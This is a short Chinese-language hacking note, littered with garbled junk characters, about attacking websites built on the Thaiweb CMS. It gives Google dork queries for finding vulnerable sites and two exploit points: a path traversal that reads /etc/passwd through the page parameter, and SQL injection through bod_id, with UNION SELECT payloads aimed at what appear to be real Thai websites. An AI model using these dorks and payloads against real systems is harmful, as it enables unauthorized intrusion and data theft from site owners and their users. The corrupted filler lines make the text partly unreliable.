Google之:* l* l$ Q, S2 s( R
4 y' r- A- [ v4 E" g4 O, D
intext:powered by Thaiweb
6 Q! x. j1 G$ N3 Y+ Y* N' g+ C4 S, d7 Y) @" i8 f+ \
inurl:index.php?page=board.php
) Y( e( w, B p, N- c" F) d% ^! i: D5 a$ u3 p
" U1 w8 g- N% S. g6 L' _
2 I: B# O" Y- H% S7 S利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd) H. q3 z A" D* S1 u' Y
9 }" A" h) h! t5 C
; G! J2 [5 W* S2 `) q$ A# Z6 u" Z: D: i5 x6 q4 N$ F$ Z; ~
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
4 V) H& N! F4 a! y/ C2 O1 ?6 ^( O, a1 G9 _/ |5 c' s
; d# U' _- L! g. r: j: i4 W
, B- K- C/ p3 d5 `' y# D X1 Lhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--4 c0 N; a( _7 N7 Y1 p! h3 n5 a
& J) b% D" R! J/ ?' O4 y5 hhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--$ g9 m3 X' e8 J" q1 T
& n0 V5 r/ D# I( t) t; ?http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
* W5 y& K- Q( Y, [ |